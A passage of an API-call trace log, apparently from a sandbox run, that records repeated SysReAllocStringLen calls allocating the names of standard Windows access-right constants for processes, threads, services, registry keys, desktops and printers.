[0120.216] SysReAllocStringLen (in: pbstr=0x2a2e710*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e710*="STANDARD_RIGHTS_EXECUTE") returned 1
[0120.216] SysReAllocStringLen (in: pbstr=0x2a2e700*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e700*="STANDARD_RIGHTS_WRITE") returned 1
[0120.217] SysReAllocStringLen (in: pbstr=0x2a2e6f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e6f0*="STANDARD_RIGHTS_READ") returned 1
[0120.217] SysReAllocStringLen (in: pbstr=0x2a2e6e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e6e0*="STANDARD_RIGHTS_ALL") returned 1
[0120.217] SysReAllocStringLen (in: pbstr=0x2a2e6d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e6d0*="DELETE") returned 1
[0120.217] SysReAllocStringLen (in: pbstr=0x2a2e6c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e6c0*="READ_CONTROL") returned 1
[0120.217] SysReAllocStringLen (in: pbstr=0x2a2e6b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e6b0*="WRITE_OWNER") returned 1
[0120.217] SysReAllocStringLen (in: pbstr=0x2a2e6a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e6a0*="WRITE_DAC") returned 1
[0120.217] SysReAllocStringLen (in: pbstr=0x2a2e690*=0x0, psz="JOB_OBJECT_SET_SECURITY_ATTRIBUTES", len=0x22 | out: pbstr=0x2a2e690*="JOB_OBJECT_SET_SECURITY_ATTRIBUTES") returned 1
[0120.217] SysReAllocStringLen (in: pbstr=0x2a2e680*=0x0, psz="JOB_OBJECT_TERMINATE", len=0x14 | out: pbstr=0x2a2e680*="JOB_OBJECT_TERMINATE") returned 1
[0120.217] SysReAllocStringLen (in: pbstr=0x2a2e670*=0x0, psz="JOB_OBJECT_QUERY", len=0x10 | out: pbstr=0x2a2e670*="JOB_OBJECT_QUERY") returned 1
[0120.217] SysReAllocStringLen (in: pbstr=0x2a2e660*=0x0, psz="JOB_OBJECT_SET_ATTRIBUTES", len=0x19 | out: pbstr=0x2a2e660*="JOB_OBJECT_SET_ATTRIBUTES") returned 1
[0120.217] SysReAllocStringLen (in: pbstr=0x2a2e650*=0x0, psz="JOB_OBJECT_ASSIGN_PROCESS", len=0x19 | out: pbstr=0x2a2e650*="JOB_OBJECT_ASSIGN_PROCESS") returned 1
[0120.217] SysReAllocStringLen (in: pbstr=0x2a2e640*=0x0, psz="JOB_OBJECT_ALL_ACCESS", len=0x15 | out: pbstr=0x2a2e640*="JOB_OBJECT_ALL_ACCESS") returned 1
[0120.217] SysReAllocStringLen (in: pbstr=0x2a2e630*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e630*="STANDARD_RIGHTS_EXECUTE") returned 1
[0120.217] SysReAllocStringLen (in: pbstr=0x2a2e620*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e620*="STANDARD_RIGHTS_WRITE") returned 1
[0120.217] SysReAllocStringLen (in: pbstr=0x2a2e610*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e610*="STANDARD_RIGHTS_READ") returned 1
[0120.217] SysReAllocStringLen (in: pbstr=0x2a2e600*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e600*="STANDARD_RIGHTS_ALL") returned 1
[0120.217] SysReAllocStringLen (in: pbstr=0x2a2e5f0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e5f0*="DELETE") returned 1
[0120.217] SysReAllocStringLen (in: pbstr=0x2a2e5e0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e5e0*="READ_CONTROL") returned 1
[0120.217] SysReAllocStringLen (in: pbstr=0x2a2e5d0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e5d0*="WRITE_OWNER") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e5c0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e5c0*="WRITE_DAC") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e5b0*=0x0, psz="THREAD_DIRECT_IMPERSONATION", len=0x1b | out: pbstr=0x2a2e5b0*="THREAD_DIRECT_IMPERSONATION") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e5a0*=0x0, psz="THREAD_IMPERSONATE", len=0x12 | out: pbstr=0x2a2e5a0*="THREAD_IMPERSONATE") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e590*=0x0, psz="THREAD_SET_THREAD_TOKEN", len=0x17 | out: pbstr=0x2a2e590*="THREAD_SET_THREAD_TOKEN") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e580*=0x0, psz="THREAD_QUERY_INFORMATION", len=0x18 | out: pbstr=0x2a2e580*="THREAD_QUERY_INFORMATION") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e570*=0x0, psz="THREAD_SET_INFORMATION", len=0x16 | out: pbstr=0x2a2e570*="THREAD_SET_INFORMATION") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e560*=0x0, psz="THREAD_SET_CONTEXT", len=0x12 | out: pbstr=0x2a2e560*="THREAD_SET_CONTEXT") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e550*=0x0, psz="THREAD_GET_CONTEXT", len=0x12 | out: pbstr=0x2a2e550*="THREAD_GET_CONTEXT") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e540*=0x0, psz="THREAD_SUSPEND_RESUME", len=0x15 | out: pbstr=0x2a2e540*="THREAD_SUSPEND_RESUME") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e530*=0x0, psz="THREAD_TERMINATE", len=0x10 | out: pbstr=0x2a2e530*="THREAD_TERMINATE") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e520*=0x0, psz="THREAD_ALL_ACCESS", len=0x11 | out: pbstr=0x2a2e520*="THREAD_ALL_ACCESS") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e510*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e510*="STANDARD_RIGHTS_EXECUTE") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e500*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e500*="STANDARD_RIGHTS_WRITE") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e4f0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e4f0*="STANDARD_RIGHTS_READ") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e4e0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e4e0*="STANDARD_RIGHTS_ALL") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e4d0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e4d0*="DELETE") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e4c0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e4c0*="READ_CONTROL") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e4b0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e4b0*="WRITE_OWNER") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e4a0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e4a0*="WRITE_DAC") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e490*=0x0, psz="PROCESS_QUERY_INFORMATION", len=0x19 | out: pbstr=0x2a2e490*="PROCESS_QUERY_INFORMATION") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e480*=0x0, psz="PROCESS_SET_INFORMATION", len=0x17 | out: pbstr=0x2a2e480*="PROCESS_SET_INFORMATION") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e470*=0x0, psz="PROCESS_SET_QUOTA", len=0x11 | out: pbstr=0x2a2e470*="PROCESS_SET_QUOTA") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e460*=0x0, psz="PROCESS_CREATE_PROCESS", len=0x16 | out: pbstr=0x2a2e460*="PROCESS_CREATE_PROCESS") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e450*=0x0, psz="PROCESS_DUP_HANDLE", len=0x12 | out: pbstr=0x2a2e450*="PROCESS_DUP_HANDLE") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e440*=0x0, psz="PROCESS_VM_WRITE", len=0x10 | out: pbstr=0x2a2e440*="PROCESS_VM_WRITE") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e430*=0x0, psz="PROCESS_VM_READ", len=0xf | out: pbstr=0x2a2e430*="PROCESS_VM_READ") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e420*=0x0, psz="PROCESS_VM_OPERATION", len=0x14 | out: pbstr=0x2a2e420*="PROCESS_VM_OPERATION") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e410*=0x0, psz="PROCESS_SET_SESSIONID", len=0x15 | out: pbstr=0x2a2e410*="PROCESS_SET_SESSIONID") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e400*=0x0, psz="PROCESS_CREATE_THREAD", len=0x15 | out: pbstr=0x2a2e400*="PROCESS_CREATE_THREAD") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e3f0*=0x0, psz="PROCESS_TERMINATE", len=0x11 | out: pbstr=0x2a2e3f0*="PROCESS_TERMINATE") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e3e0*=0x0, psz="PROCESS_ALL_ACCESS", len=0x12 | out: pbstr=0x2a2e3e0*="PROCESS_ALL_ACCESS") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e3d0*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e3d0*="STANDARD_RIGHTS_EXECUTE") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e3c0*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e3c0*="STANDARD_RIGHTS_WRITE") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e3b0*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e3b0*="STANDARD_RIGHTS_READ") returned 1
[0120.218] SysReAllocStringLen (in: pbstr=0x2a2e3a0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e3a0*="STANDARD_RIGHTS_ALL") returned 1
[0120.219] SysReAllocStringLen (in: pbstr=0x2a2e390*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e390*="DELETE") returned 1
[0120.219] SysReAllocStringLen (in: pbstr=0x2a2e380*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e380*="READ_CONTROL") returned 1
[0120.219] SysReAllocStringLen (in: pbstr=0x2a2e370*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e370*="WRITE_OWNER") returned 1
[0120.219] SysReAllocStringLen (in: pbstr=0x2a2e360*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e360*="WRITE_DAC") returned 1
[0120.219] SysReAllocStringLen (in: pbstr=0x2a2e350*=0x0, psz="PERM_FILE_CREATE", len=0x10 | out: pbstr=0x2a2e350*="PERM_FILE_CREATE") returned 1
[0120.219] SysReAllocStringLen (in: pbstr=0x2a2e340*=0x0, psz="PERM_FILE_WRITE", len=0xf | out: pbstr=0x2a2e340*="PERM_FILE_WRITE") returned 1
[0120.219] SysReAllocStringLen (in: pbstr=0x2a2e330*=0x0, psz="PERM_FILE_READ", len=0xe | out: pbstr=0x2a2e330*="PERM_FILE_READ") returned 1
[0120.219] SysReAllocStringLen (in: pbstr=0x2a2e320*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e320*="STANDARD_RIGHTS_EXECUTE") returned 1
[0120.219] SysReAllocStringLen (in: pbstr=0x2a2e310*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e310*="STANDARD_RIGHTS_WRITE") returned 1
[0120.219] SysReAllocStringLen (in: pbstr=0x2a2e300*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e300*="STANDARD_RIGHTS_READ") returned 1
[0120.219] SysReAllocStringLen (in: pbstr=0x2a2e2f0*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e2f0*="STANDARD_RIGHTS_ALL") returned 1
[0120.219] SysReAllocStringLen (in: pbstr=0x2a2e2e0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e2e0*="DELETE") returned 1
[0120.219] SysReAllocStringLen (in: pbstr=0x2a2e2d0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e2d0*="READ_CONTROL") returned 1
[0120.219] SysReAllocStringLen (in: pbstr=0x2a2e2c0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e2c0*="WRITE_OWNER") returned 1
[0120.219] SysReAllocStringLen (in: pbstr=0x2a2e2b0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e2b0*="WRITE_DAC") returned 1
[0120.219] SysReAllocStringLen (in: pbstr=0x2a2e2a0*=0x0, psz="JOB_ACCESS_ADMINISTER", len=0x15 | out: pbstr=0x2a2e2a0*="JOB_ACCESS_ADMINISTER") returned 1
[0120.219] SysReAllocStringLen (in: pbstr=0x2a2e290*=0x0, psz="PRINTER_ACCESS_USE", len=0x12 | out: pbstr=0x2a2e290*="PRINTER_ACCESS_USE") returned 1
[0120.219] SysReAllocStringLen (in: pbstr=0x2a2e280*=0x0, psz="PRINTER_ACCESS_ADMINISTER", len=0x19 | out: pbstr=0x2a2e280*="PRINTER_ACCESS_ADMINISTER") returned 1
[0120.219] SysReAllocStringLen (in: pbstr=0x2a2e270*=0x0, psz="SERVER_ACCESS_ENUMERATE", len=0x17 | out: pbstr=0x2a2e270*="SERVER_ACCESS_ENUMERATE") returned 1
[0120.219] SysReAllocStringLen (in: pbstr=0x2a2e260*=0x0, psz="SERVER_ACCESS_ADMINISTER", len=0x18 | out: pbstr=0x2a2e260*="SERVER_ACCESS_ADMINISTER") returned 1
[0120.219] SysReAllocStringLen (in: pbstr=0x2a2e250*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x2a2e250*="PRINTER_ALL_ACCESS") returned 1
[0120.219] SysReAllocStringLen (in: pbstr=0x2a2e240*=0x0, psz="PRINTER_EXECUTE", len=0xf | out: pbstr=0x2a2e240*="PRINTER_EXECUTE") returned 1
[0120.219] SysReAllocStringLen (in: pbstr=0x2a2e230*=0x0, psz="PRINTER_WRITE", len=0xd | out: pbstr=0x2a2e230*="PRINTER_WRITE") returned 1
[0120.219] SysReAllocStringLen (in: pbstr=0x2a2e220*=0x0, psz="PRINTER_READ", len=0xc | out: pbstr=0x2a2e220*="PRINTER_READ") returned 1
[0120.219] SysReAllocStringLen (in: pbstr=0x2a2e210*=0x0, psz="PRINTER_ALL_ACCESS", len=0x12 | out: pbstr=0x2a2e210*="PRINTER_ALL_ACCESS") returned 1
[0120.219] SysReAllocStringLen (in: pbstr=0x2a2e200*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e200*="DELETE") returned 1
[0120.219] SysReAllocStringLen (in: pbstr=0x2a2e1f0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e1f0*="READ_CONTROL") returned 1
[0120.219] SysReAllocStringLen (in: pbstr=0x2a2e1e0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e1e0*="WRITE_OWNER") returned 1
[0120.219] SysReAllocStringLen (in: pbstr=0x2a2e1d0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e1d0*="WRITE_DAC") returned 1
[0120.219] SysReAllocStringLen (in: pbstr=0x2a2e1c0*=0x0, psz="SC_MANAGER_QUERY_LOCK_STATUS", len=0x1c | out: pbstr=0x2a2e1c0*="SC_MANAGER_QUERY_LOCK_STATUS") returned 1
[0120.219] SysReAllocStringLen (in: pbstr=0x2a2e1b0*=0x0, psz="SC_MANAGER_MODIFY_BOOT_CONFIG", len=0x1d | out: pbstr=0x2a2e1b0*="SC_MANAGER_MODIFY_BOOT_CONFIG") returned 1
[0120.219] SysReAllocStringLen (in: pbstr=0x2a2e1a0*=0x0, psz="SC_MANAGER_LOCK", len=0xf | out: pbstr=0x2a2e1a0*="SC_MANAGER_LOCK") returned 1
[0120.220] SysReAllocStringLen (in: pbstr=0x2a2e190*=0x0, psz="SC_MANAGER_ENUMERATE_SERVICE", len=0x1c | out: pbstr=0x2a2e190*="SC_MANAGER_ENUMERATE_SERVICE") returned 1
[0120.220] SysReAllocStringLen (in: pbstr=0x2a2e180*=0x0, psz="SC_MANAGER_CONNECT", len=0x12 | out: pbstr=0x2a2e180*="SC_MANAGER_CONNECT") returned 1
[0120.220] SysReAllocStringLen (in: pbstr=0x2a2e170*=0x0, psz="SC_MANAGER_CREATE_SERVICE", len=0x19 | out: pbstr=0x2a2e170*="SC_MANAGER_CREATE_SERVICE") returned 1
[0120.220] SysReAllocStringLen (in: pbstr=0x2a2e160*=0x0, psz="SC_MANAGER_ALL_ACCESS", len=0x15 | out: pbstr=0x2a2e160*="SC_MANAGER_ALL_ACCESS") returned 1
[0120.220] SysReAllocStringLen (in: pbstr=0x2a2e150*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e150*="STANDARD_RIGHTS_EXECUTE") returned 1
[0120.220] SysReAllocStringLen (in: pbstr=0x2a2e140*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e140*="STANDARD_RIGHTS_WRITE") returned 1
[0120.220] SysReAllocStringLen (in: pbstr=0x2a2e130*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e130*="STANDARD_RIGHTS_READ") returned 1
[0120.220] SysReAllocStringLen (in: pbstr=0x2a2e120*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e120*="STANDARD_RIGHTS_ALL") returned 1
[0120.220] SysReAllocStringLen (in: pbstr=0x2a2e110*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2e110*="DELETE") returned 1
[0120.220] SysReAllocStringLen (in: pbstr=0x2a2e100*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2e100*="READ_CONTROL") returned 1
[0120.220] SysReAllocStringLen (in: pbstr=0x2a2e0f0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2e0f0*="WRITE_OWNER") returned 1
[0120.220] SysReAllocStringLen (in: pbstr=0x2a2e0e0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2e0e0*="WRITE_DAC") returned 1
[0120.220] SysReAllocStringLen (in: pbstr=0x2a2e0d0*=0x0, psz="SERVICE_USER_DEFINED_CONTROL", len=0x1c | out: pbstr=0x2a2e0d0*="SERVICE_USER_DEFINED_CONTROL") returned 1
[0120.220] SysReAllocStringLen (in: pbstr=0x2a2e0c0*=0x0, psz="SERVICE_STOP", len=0xc | out: pbstr=0x2a2e0c0*="SERVICE_STOP") returned 1
[0120.220] SysReAllocStringLen (in: pbstr=0x2a2e0b0*=0x0, psz="SERVICE_START", len=0xd | out: pbstr=0x2a2e0b0*="SERVICE_START") returned 1
[0120.220] SysReAllocStringLen (in: pbstr=0x2a2e0a0*=0x0, psz="SERVICE_QUERY_STATUS", len=0x14 | out: pbstr=0x2a2e0a0*="SERVICE_QUERY_STATUS") returned 1
[0120.220] SysReAllocStringLen (in: pbstr=0x2a2e090*=0x0, psz="SERVICE_QUERY_CONFIG", len=0x14 | out: pbstr=0x2a2e090*="SERVICE_QUERY_CONFIG") returned 1
[0120.220] SysReAllocStringLen (in: pbstr=0x2a2e080*=0x0, psz="SERVICE_PAUSE_CONTINUE", len=0x16 | out: pbstr=0x2a2e080*="SERVICE_PAUSE_CONTINUE") returned 1
[0120.220] SysReAllocStringLen (in: pbstr=0x2a2e070*=0x0, psz="SERVICE_INTERROGATE", len=0x13 | out: pbstr=0x2a2e070*="SERVICE_INTERROGATE") returned 1
[0120.220] SysReAllocStringLen (in: pbstr=0x2a2e060*=0x0, psz="SERVICE_ENUMERATE_DEPENDENTS", len=0x1c | out: pbstr=0x2a2e060*="SERVICE_ENUMERATE_DEPENDENTS") returned 1
[0120.220] SysReAllocStringLen (in: pbstr=0x2a2e050*=0x0, psz="SERVICE_CHANGE_CONFIG", len=0x15 | out: pbstr=0x2a2e050*="SERVICE_CHANGE_CONFIG") returned 1
[0120.220] SysReAllocStringLen (in: pbstr=0x2a2e040*=0x0, psz="SERVICE_ALL_ACCESS", len=0x12 | out: pbstr=0x2a2e040*="SERVICE_ALL_ACCESS") returned 1
[0120.220] SysReAllocStringLen (in: pbstr=0x2a2e030*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2e030*="STANDARD_RIGHTS_EXECUTE") returned 1
[0120.220] SysReAllocStringLen (in: pbstr=0x2a2e020*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2e020*="STANDARD_RIGHTS_WRITE") returned 1
[0120.220] SysReAllocStringLen (in: pbstr=0x2a2e010*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2e010*="STANDARD_RIGHTS_READ") returned 1
[0120.220] SysReAllocStringLen (in: pbstr=0x2a2e000*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2e000*="STANDARD_RIGHTS_ALL") returned 1
[0120.220] SysReAllocStringLen (in: pbstr=0x2a2dff0*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2dff0*="DELETE") returned 1
[0120.220] SysReAllocStringLen (in: pbstr=0x2a2dfe0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2dfe0*="READ_CONTROL") returned 1
[0120.220] SysReAllocStringLen (in: pbstr=0x2a2dfd0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2dfd0*="WRITE_OWNER") returned 1
[0120.220] SysReAllocStringLen (in: pbstr=0x2a2dfc0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2dfc0*="WRITE_DAC") returned 1
[0120.220] SysReAllocStringLen (in: pbstr=0x2a2dfb0*=0x0, psz="KEY_SET_VALUE", len=0xd | out: pbstr=0x2a2dfb0*="KEY_SET_VALUE") returned 1
[0120.221] SysReAllocStringLen (in: pbstr=0x2a2dfa0*=0x0, psz="KEY_CREATE_LINK", len=0xf | out: pbstr=0x2a2dfa0*="KEY_CREATE_LINK") returned 1
[0120.221] SysReAllocStringLen (in: pbstr=0x2a2df90*=0x0, psz="KEY_CREATE_SUB_KEY", len=0x12 | out: pbstr=0x2a2df90*="KEY_CREATE_SUB_KEY") returned 1
[0120.221] SysReAllocStringLen (in: pbstr=0x2a2df80*=0x0, psz="KEY_NOTIFY", len=0xa | out: pbstr=0x2a2df80*="KEY_NOTIFY") returned 1
[0120.221] SysReAllocStringLen (in: pbstr=0x2a2df70*=0x0, psz="KEY_ENUMERATE_SUB_KEYS", len=0x16 | out: pbstr=0x2a2df70*="KEY_ENUMERATE_SUB_KEYS") returned 1
[0120.221] SysReAllocStringLen (in: pbstr=0x2a2df60*=0x0, psz="KEY_QUERY_VALUE", len=0xf | out: pbstr=0x2a2df60*="KEY_QUERY_VALUE") returned 1
[0120.221] SysReAllocStringLen (in: pbstr=0x2a2df50*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2df50*="STANDARD_RIGHTS_EXECUTE") returned 1
[0120.221] SysReAllocStringLen (in: pbstr=0x2a2df40*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2df40*="STANDARD_RIGHTS_WRITE") returned 1
[0120.221] SysReAllocStringLen (in: pbstr=0x2a2df30*=0x0, psz="STANDARD_RIGHTS_READ 2", len=0x16 | out: pbstr=0x2a2df30*="STANDARD_RIGHTS_READ 2") returned 1
[0120.221] SysReAllocStringLen (in: pbstr=0x2a2df20*=0x0, psz="STANDARD_RIGHTS_ALL 1", len=0x15 | out: pbstr=0x2a2df20*="STANDARD_RIGHTS_ALL 1") returned 1
[0120.221] SysReAllocStringLen (in: pbstr=0x2a2df10*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2df10*="DELETE") returned 1
[0120.221] SysReAllocStringLen (in: pbstr=0x2a2df00*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2df00*="READ_CONTROL") returned 1
[0120.221] SysReAllocStringLen (in: pbstr=0x2a2def0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2def0*="WRITE_OWNER") returned 1
[0120.221] SysReAllocStringLen (in: pbstr=0x2a2dee0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2dee0*="WRITE_DAC") returned 1
[0120.221] SysReAllocStringLen (in: pbstr=0x2a2ded0*=0x0, psz="DESKTOP_SWITCHDESKTOP", len=0x15 | out: pbstr=0x2a2ded0*="DESKTOP_SWITCHDESKTOP") returned 1
[0120.221] SysReAllocStringLen (in: pbstr=0x2a2dec0*=0x0, psz="DESKTOP_WRITEOBJECTS", len=0x14 | out: pbstr=0x2a2dec0*="DESKTOP_WRITEOBJECTS") returned 1
[0120.221] SysReAllocStringLen (in: pbstr=0x2a2deb0*=0x0, psz="DESKTOP_JOURNALRECORD", len=0x15 | out: pbstr=0x2a2deb0*="DESKTOP_JOURNALRECORD") returned 1
[0120.221] SysReAllocStringLen (in: pbstr=0x2a2dea0*=0x0, psz="DESKTOP_JOURNALPLAYBACK", len=0x17 | out: pbstr=0x2a2dea0*="DESKTOP_JOURNALPLAYBACK") returned 1
[0120.221] SysReAllocStringLen (in: pbstr=0x2a2de90*=0x0, psz="DESKTOP_HOOKCONTROL", len=0x13 | out: pbstr=0x2a2de90*="DESKTOP_HOOKCONTROL") returned 1
[0120.221] SysReAllocStringLen (in: pbstr=0x2a2de80*=0x0, psz="DESKTOP_CREATEWINDOW", len=0x14 | out: pbstr=0x2a2de80*="DESKTOP_CREATEWINDOW") returned 1
[0120.221] SysReAllocStringLen (in: pbstr=0x2a2de70*=0x0, psz="DESKTOP_CREATEMENU", len=0x12 | out: pbstr=0x2a2de70*="DESKTOP_CREATEMENU") returned 1
[0120.221] SysReAllocStringLen (in: pbstr=0x2a2de60*=0x0, psz="DESKTOP_READOBJECTS", len=0x13 | out: pbstr=0x2a2de60*="DESKTOP_READOBJECTS") returned 1
[0120.221] SysReAllocStringLen (in: pbstr=0x2a2de50*=0x0, psz="DESKTOP_ENUMERATE", len=0x11 | out: pbstr=0x2a2de50*="DESKTOP_ENUMERATE") returned 1
[0120.221] SysReAllocStringLen (in: pbstr=0x2a2de40*=0x0, psz="STANDARD_RIGHTS_EXECUTE", len=0x17 | out: pbstr=0x2a2de40*="STANDARD_RIGHTS_EXECUTE") returned 1
[0120.221] SysReAllocStringLen (in: pbstr=0x2a2de30*=0x0, psz="STANDARD_RIGHTS_WRITE", len=0x15 | out: pbstr=0x2a2de30*="STANDARD_RIGHTS_WRITE") returned 1
[0120.221] SysReAllocStringLen (in: pbstr=0x2a2de20*=0x0, psz="STANDARD_RIGHTS_READ", len=0x14 | out: pbstr=0x2a2de20*="STANDARD_RIGHTS_READ") returned 1
[0120.221] SysReAllocStringLen (in: pbstr=0x2a2de10*=0x0, psz="STANDARD_RIGHTS_ALL", len=0x13 | out: pbstr=0x2a2de10*="STANDARD_RIGHTS_ALL") returned 1
[0120.221] SysReAllocStringLen (in: pbstr=0x2a2de00*=0x0, psz="DELETE", len=0x6 | out: pbstr=0x2a2de00*="DELETE") returned 1
[0120.221] SysReAllocStringLen (in: pbstr=0x2a2ddf0*=0x0, psz="READ_CONTROL", len=0xc | out: pbstr=0x2a2ddf0*="READ_CONTROL") returned 1
[0120.221] SysReAllocStringLen (in: pbstr=0x2a2dde0*=0x0, psz="WRITE_OWNER", len=0xb | out: pbstr=0x2a2dde0*="WRITE_OWNER") returned 1
[0120.221] SysReAllocStringLen (in: pbstr=0x2a2ddd0*=0x0, psz="WRITE_DAC", len=0x9 | out: pbstr=0x2a2ddd0*="WRITE_DAC") returned 1
[0120.222] SysReAllocStringLen (in: pbstr=0x2a2ddc0*=0x0, psz="WINSTA_WRITEATTRIBUTES", len=0x16 | out: pbstr=0x2a2ddc0*="WINSTA_WRITEATTRIBUTES") returned 1
[0120.222] SysReAllocStringLen (in: pbstr=0x2a2ddb0*=0x0, psz="WINSTA_READSCREEN", len=0x11 | out: pbstr=0x2a2ddb0*="WINSTA_READSCREEN") returned 1
[0120.222] SysReAllocStringLen (in: pbstr=0x2a2dda0*=0x0, psz="WINSTA_READATTRIBUTES", len=0x15 | out: pbstr=0x2a2dda0*="WINSTA_READATTRIBUTES") returned 1
